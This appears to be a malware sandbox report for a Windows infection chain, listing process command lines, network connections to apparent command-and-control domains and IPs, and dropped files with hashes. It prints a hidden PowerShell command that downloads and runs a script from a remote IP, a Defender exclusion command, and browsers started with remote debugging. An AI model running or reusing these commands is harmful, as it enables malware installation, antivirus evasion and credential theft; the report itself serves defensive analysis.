"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5472 -childID 5 -isForBrowser -prefsHandle 5480 -prefMapHandle 5484 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3e37934-9c7f-44ee-8dd6-66fdc58491d7} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab

C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe

"C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe"

C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5796 -ip 5796

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 792

C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1212 -ip 1212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 808

C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe"

C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2368.tmp\2369.tmp\236A.bat C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\EX0eXUWS\Anubis.exe""

C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbc4e2cc40,0x7ffbc4e2cc4c,0x7ffbc4e2cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2288,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2280 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1764,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2512 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1964,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2556 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4416,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4484 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe

"C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4760 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4820,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4828 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5012,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4984 /prefetch:8

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yx3jx0rn\yx3jx0rn.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60BF.tmp" "c:\Users\Admin\AppData\Local\Temp\yx3jx0rn\CSCEDF5BF9B205D4E9AA655161C65EFDFFA.TMP"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5256,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5196 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5016,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5028 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbcc0346f8,0x7ffbcc034708,0x7ffbcc034718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,3000808488345216500,17110035482850691465,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,3000808488345216500,17110035482850691465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,3000808488345216500,17110035482850691465,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2044,3000808488345216500,17110035482850691465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2044,3000808488345216500,17110035482850691465,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 8.8.8.8:53 g.bing.com udp
US 172.67.212.102:443 codxefusion.top tcp
US 150.171.28.10:443 g.bing.com tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.48.1:443 exarthynature.run tcp
US 104.21.48.1:443 exarthynature.run tcp
US 104.21.48.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.16.1:443 croprojegies.run tcp
US 104.21.16.1:443 croprojegies.run tcp
US 104.21.16.1:443 croprojegies.run tcp
US 104.21.16.1:443 croprojegies.run tcp
US 104.21.16.1:443 croprojegies.run tcp
US 104.21.16.1:443 croprojegies.run tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 45.93.20.28:80 45.93.20.28 tcp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 www.youtube.com udp
GB 172.217.16.238:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 172.217.16.238:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.prod.mozaws.net tcp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 8.8.8.8:53 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
GB 216.58.204.68:443 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
N/A 127.0.0.1:58842 tcp
N/A 127.0.0.1:58853 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.79:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com udp
US 8.8.8.8:53 r3---sn-aigzrnsl.gvt1.com udp
GB 74.125.168.232:443 r3---sn-aigzrnsl.gvt1.com tcp
US 8.8.8.8:53 r3.sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 r3.sn-aigzrnsl.gvt1.com udp
GB 74.125.168.232:443 r3.sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
DE 5.75.210.149:443 tcp
US 35.190.72.216:443 location.services.mozilla.com udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 ls.t.goldenloafuae.com udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 avx.medianewsonline.com udp
US 8.8.8.8:53 e5.o.lencr.org udp
BG 185.176.43.98:80 avx.medianewsonline.com tcp
BG 185.176.43.98:80 avx.medianewsonline.com tcp
GB 104.86.110.232:80 e5.o.lencr.org tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
CH 185.208.156.162:80 185.208.156.162 tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 explorebieology.run udp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.10:443 ogads-pa.googleapis.com tcp
GB 216.58.201.110:443 apis.google.com tcp
GB 142.250.200.10:443 ogads-pa.googleapis.com udp
US 172.67.189.66:443 moderzysics.top tcp
GB 142.250.200.14:443 play.google.com tcp
GB 142.250.200.14:443 play.google.com udp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 clients2.google.com udp
US 172.67.189.66:443 moderzysics.top tcp
GB 142.250.180.14:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.169.65:443 clients2.googleusercontent.com tcp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 213.209.150.137:4151 towerbingobongoboom.com tcp
GB 216.58.213.14:443 consent.youtube.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp

Files

memory/532-0-0x0000000000E70000-0x000000000117D000-memory.dmp

memory/532-1-0x0000000077D34000-0x0000000077D36000-memory.dmp

memory/532-2-0x0000000000E71000-0x0000000000ED1000-memory.dmp

memory/532-3-0x0000000000E70000-0x000000000117D000-memory.dmp

memory/532-4-0x0000000000E70000-0x000000000117D000-memory.dmp

memory/532-5-0x0000000000E70000-0x000000000117D000-memory.dmp

memory/532-6-0x0000000000E70000-0x000000000117D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe

MD5 1565063ca3d43812789fbf960418659e
SHA1 d710ecdf1861e25498d1886f8c2a44f31826fd55
SHA256 c5b7480a6d02c38a408981322c52ad0d6efbdc0a0d6508d788d3575c561cc978
SHA512 eb044ea8ecdfed744685623fd3bf16dc0221900b405eff580d93de62073e31b93b23b69e81fea1a2bff6deac793cee038587d127fb3ddcca1359f3380f7cca42

memory/2140-11-0x00000000007B0000-0x0000000000C6C000-memory.dmp

memory/532-10-0x0000000000E71000-0x0000000000ED1000-memory.dmp

memory/532-14-0x0000000000E70000-0x000000000117D000-memory.dmp

memory/2140-15-0x00000000007B1000-0x00000000007DF000-memory.dmp

memory/2140-16-0x00000000007B0000-0x0000000000C6C000-memory.dmp

memory/2140-17-0x00000000007B0000-0x0000000000C6C000-memory.dmp

memory/2940-31-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/2140-30-0x00000000007B0000-0x0000000000C6C000-memory.dmp

memory/2940-32-0x0000000000E61000-0x0000000000E8F000-memory.dmp

memory/2940-33-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/2940-34-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/2940-35-0x0000000000E60000-0x000000000131C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 a9749ee52eefb0fd48a66527095354bb
SHA1 78170bcc54e1f774528dea3118b50ffc46064fe0
SHA256 b1663d4497ddd27a59f090b72adcedddac51724a1c126f7d6469f8045d065e15
SHA512 9d21f0e1e376b89df717403a3939ed86ef61095bb9f0167ff15c01d3bbbee03d4dd01b3e2769ecd921e40e43bab3cbf0a6844ab6f296982227b0cb507b4b0e25

memory/2940-61-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/2940-62-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/2940-63-0x0000000000E60000-0x000000000131C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe

MD5 07164c5597a4fbd5cf8c5ebcc43fcbd3
SHA1 d8ffc868f9a36ab2323440bc0a263e2e3e52def3
SHA256 2ea53f7442f44cfc2ea88f2b52d6841ec009d4789f67fd002530e4dece4235d3
SHA512 87d4f793aee02e5e484588913034caddfab25381a959815c57d0ec2979539c641a25cabe43c917659cc912d851c5d7d7dc64f02a01e541b554b3eedc8e0477d9

C:\Users\Admin\AppData\Local\Temp\kao0wjnJg.hta

MD5 0d2e1136fc6902de8d50d025d9c214e5
SHA1 f08f545d1da83163cc5d80824de853dcea9f8f1a
SHA256 5fc59b0ffdfe0befef7658c06f8a0e96566184b4ed24813ef97412fa06cb7bdb
SHA512 bfdfcf8cf45e2c4a9b3fe2a263333ce0cbcc47d954469cbf380a46b4e800dea37dd23305c1c57efe45dff7677ba035b3f0e996e280804516b49f725983828b1c

memory/1496-83-0x0000000004610000-0x0000000004646000-memory.dmp

memory/1496-84-0x0000000004C80000-0x00000000052A8000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
